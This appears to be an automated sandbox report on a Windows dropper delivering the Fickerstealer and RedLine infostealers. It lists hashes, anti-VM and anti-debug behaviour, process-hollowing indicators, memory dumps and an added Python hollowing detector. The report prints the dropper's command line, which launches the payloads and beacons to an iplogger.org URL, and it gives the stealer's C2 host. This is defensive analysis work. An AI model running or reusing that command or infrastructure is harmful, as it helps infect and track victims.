Analysis
Max time kernel: 155s
Max time network: 171s
Platform: windows7_x64
Resource: win7-en-20211208
Submitted: 15-02-2022 12:04

Static task: static1
Behavioral task: behavioral1
  Sample: 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
  Resource: win10v2004-en-20220112
General
Target: 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
Size: 3.0MB
MD5: c0786eaf915a205bb066e598e5418c6b
SHA1: 8440f9408fa74c88fad34977ca1ac639c1f5ef2e
SHA256: 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed
SHA512: 4ecad942db3dc06da1c6c158e850eb7460bd4e3ba51e6abb304fec81cbd27aff475e9e3df37043de0dbc4f757b03a1588eb13c560a687c8d039a41bc6667c2c4
Malware Config
Extracted
fickerstealer
game2030.site:80
Signatures
-
Fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
  Resource: behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp
  YARA rule: family_redline
  (This is the 7.4MB dump of Ww.exe, PID 1148; the same region also matches the net_reactor and themida rules below.)
.NET Reactor protector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
  Resource: behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp
  YARA rule: net_reactor
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 3 IoCs
Processes:
  PID 568   MMP1.exe
  PID 1148  Ww.exe
  PID 992   MMP1.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  Ww.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  Ww.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
Loads dropped DLL 5 IoCs
Processes:
  PID 1672  7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
  PID 1408  cmd.exe (three loads)
  PID 568   MMP1.exe
Themida packer 4 IoCs
  \Users\Admin\AppData\Local\Temp\Ww.exe  themida
  C:\Users\Admin\AppData\Local\Temp\Ww.exe  themida
  C:\Users\Admin\AppData\Local\Temp\Ww.exe  themida
  behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp  themida
Checks whether UAC is enabled 1 IoCs
Processes:
  Ww.exe  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Network:
  flow 4  api.ipify.org
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
  PID 1148  Ww.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
  PID 568 MMP1.exe  set thread context of  PID 992 MMP1.exe
Taken together with the 20 WriteProcessMemory calls from PID 568 into PID 992 recorded below, a parent writing into a child of its own image and then redirecting that child's thread is the process-hollowing pattern; the second MMP1.exe (PID 992) is the process whose memory should be dumped for the real payload.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
(This is the sandbox's generic description for the signature; nothing else in this report records file encryption, and the families identified are infostealers.)
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
  PID 1148  Ww.exe
  PID 1784  powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
  PID 1784  powershell.exe  Token: SeDebugPrivilege
Suspicious use of WriteProcessMemory 36 IoCs
Processes (source PID -> target PID, number of writes recorded):
  PID 1672  7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe  ->  PID 1408  cmd.exe         4
  PID 1408  cmd.exe                                                                ->  PID 568   MMP1.exe        4
  PID 1408  cmd.exe                                                                ->  PID 1148  Ww.exe          4
  PID 1408  cmd.exe                                                                ->  PID 1784  powershell.exe  4
  PID 568   MMP1.exe                                                               ->  PID 992   MMP1.exe        20
Each child that cmd.exe launches accounts for four writes; the twenty writes from MMP1.exe (568) into its own child MMP1.exe (992) are the outlier, and that pair is the one for which SetThreadContext was also recorded.
Processes
C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe  (PID 1672)
  "C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe  (PID 1408)
    "cmd" /c start "" "MMP1.exe" & start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\MMP1.exe  (PID 568)
      "MMP1.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\MMP1.exe  (PID 992)
        "MMP1.exe"
        - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\Ww.exe  (PID 1148)
      "Ww.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1784)
      powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
(PIDs are taken from the IoC tables above. The cmd.exe command line shows the dropper's whole job: launch both dropped executables, then fetch an iplogger.org URL from PowerShell, which serves as an installation beacon.)
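The process tree and the WriteProcessMemory and SetThreadContext tables describe one sequence: MMP1.exe (PID 568) writes into a second MMP1.exe (PID 992) twenty times and then sets its thread context. The script below is an added example, not part of this report or of any sandbox vendor's tooling. It rebuilds the spawn tree from the report's memory-write events and flags the same-image write-then-SetThreadContext pattern. The event records are constructed by hand from the tables above; their layout (api, source PID, target PID) is an assumption of this example, not a sandbox export format.

```python
"""Rebuild the spawn tree and flag process hollowing from sandbox API events.

Added example; the event list is hand-constructed from the report's
WriteProcessMemory and SetThreadContext tables (PIDs, images and counts are
the report's; the record layout is an assumption, not a sandbox export).
"""
from collections import Counter, defaultdict

# pid -> image name, as listed in the report's process tables.
PROCESSES = {
    1672: "7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe",
    1408: "cmd.exe",
    568: "MMP1.exe",
    992: "MMP1.exe",
    1148: "Ww.exe",
    1784: "powershell.exe",
}

# (api, source_pid, target_pid); multiplicities reproduce the report's
# 36 WriteProcessMemory rows and its single SetThreadContext row.
EVENTS = (
    [("WriteProcessMemory", 1672, 1408)] * 4
    + [("WriteProcessMemory", 1408, 568)] * 4
    + [("WriteProcessMemory", 1408, 1148)] * 4
    + [("WriteProcessMemory", 1408, 1784)] * 4
    + [("WriteProcessMemory", 568, 992)] * 20
    + [("SetThreadContext", 568, 992)]
)

# Writes a parent makes into a child it has just created are routine; in
# this report every plain CreateProcess from cmd.exe accounts for exactly
# four.  Well above that, into a child of the same image, followed by
# SetThreadContext, is the hollowing pattern.  Threshold is an assumption.
ROUTINE_WRITES = 4


def write_counts(events):
    """Number of WriteProcessMemory calls per (source_pid, target_pid)."""
    return Counter((s, t) for api, s, t in events if api == "WriteProcessMemory")


def spawn_tree(events):
    """parent -> [children], using the first cross-process write as the spawn edge."""
    children = defaultdict(list)
    for api, s, t in events:
        if api == "WriteProcessMemory" and t not in children[s]:
            children[s].append(t)
    return dict(children)


def render_tree(children, processes, root, depth=0):
    """Indented text tree, one line per process, mirroring the report's layout."""
    lines = [f"{'  ' * depth}{processes[root]} (PID {root})"]
    for child in children.get(root, []):
        lines.extend(render_tree(children, processes, child, depth + 1))
    return lines


def hollowing_candidates(events, processes):
    """Every SetThreadContext edge, scored on write volume and image match."""
    writes = write_counts(events)
    out = []
    for api, s, t in events:
        if api != "SetThreadContext":
            continue
        same_image = processes.get(s) == processes.get(t)
        n = writes[(s, t)]
        out.append({
            "source": s, "target": t, "image": processes.get(t),
            "writes": n, "same_image": same_image,
            "suspicious": same_image and n > ROUTINE_WRITES,
        })
    return out


if __name__ == "__main__":
    print("\n".join(render_tree(spawn_tree(EVENTS), PROCESSES, 1672)))
    for hit in hollowing_candidates(EVENTS, PROCESSES):
        print(hit)
```

Run on the constructed events it prints the six-process tree from the report and one candidate: source 568, target 992, image MMP1.exe, 20 writes, same image, suspicious. The same logic applies unchanged to any event source that yields (api, source, target) triples, for example a Sysmon or EDR feed, so long as the per-environment baseline for routine parent-to-child writes is measured rather than copied from this one report.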
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\MMP1.exe
  MD5: 5ca7fa3d1d1efdffada437068eccbd4e
  SHA1: 0204b4435a79e1d3ce325706801ba3687e86dccf
  SHA256: 8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
  SHA512: 15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
C:\Users\Admin\AppData\Local\Temp\Ww.exe
  MD5: e58d740f792702828c45ebfb73c8a95d
  SHA1: 8eeb2a9357aa57affb56cc938342d3dd7bb6f0c9
  SHA256: ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10
  SHA512: 9152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8
\Users\Admin\AppData\Local\Temp\MMP1.exe
  MD5: 5ca7fa3d1d1efdffada437068eccbd4e
  SHA1: 0204b4435a79e1d3ce325706801ba3687e86dccf
  SHA256: 8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
  SHA512: 15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
\Users\Admin\AppData\Local\Temp\Ww.exe
  MD5: e58d740f792702828c45ebfb73c8a95d
  SHA1: 8eeb2a9357aa57affb56cc938342d3dd7bb6f0c9
  SHA256: ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10
  SHA512: 9152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8
\Users\Admin\AppData\Local\Temp\nst2A0E.tmp\JHILLSVZFH1MBP.dll
  MD5: 293165db1e46070410b4209519e67494
  SHA1: 777b96a4f74b6c34d43a4e7c7e656757d1c97f01
  SHA256: 49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
  SHA512: 97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
Memory dumps (PID-index, address range, size)

PID 568 (MMP1.exe, parent)
  memory/568-71-0x000000000245B000-0x0000000002483000-memory.dmp  160KB
  memory/568-75-0x000000000245B000-0x0000000002483000-memory.dmp  160KB
  memory/568-76-0x00000000002B0000-0x00000000002F7000-memory.dmp  284KB

PID 992 (MMP1.exe, child with thread context set by 568)
  memory/992-73-0x0000000000400000-0x000000000044F000-memory.dmp  316KB
  memory/992-77-0x0000000000400000-0x000000000044F000-memory.dmp  316KB

PID 1148 (Ww.exe)
  memory/1148-65-0x0000000077064000-0x0000000077065000-memory.dmp  4KB
  memory/1148-66-0x000000007738E000-0x000000007738F000-memory.dmp  4KB
  memory/1148-67-0x0000000077061000-0x0000000077062000-memory.dmp  4KB
  memory/1148-70-0x0000000077820000-0x0000000077822000-memory.dmp  8KB
  memory/1148-79-0x00000000740CE000-0x00000000740CF000-memory.dmp  4KB
  memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp  7.4MB  (matches family_redline, net_reactor, themida)
  memory/1148-86-0x00000000054B0000-0x00000000054B1000-memory.dmp  4KB

PID 1672 (7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe)
  memory/1672-55-0x0000000075321000-0x0000000075323000-memory.dmp  8KB

PID 1784 (powershell.exe)
  memory/1784-81-0x0000000072081000-0x0000000072082000-memory.dmp  4KB
  memory/1784-82-0x0000000002650000-0x0000000002651000-memory.dmp  4KB
  memory/1784-83-0x0000000072082000-0x0000000072084000-memory.dmp  8KB
  memory/1784-84-0x0000000002651000-0x0000000002652000-memory.dmp  4KB
  memory/1784-85-0x0000000002652000-0x0000000002654000-memory.dmp  8KB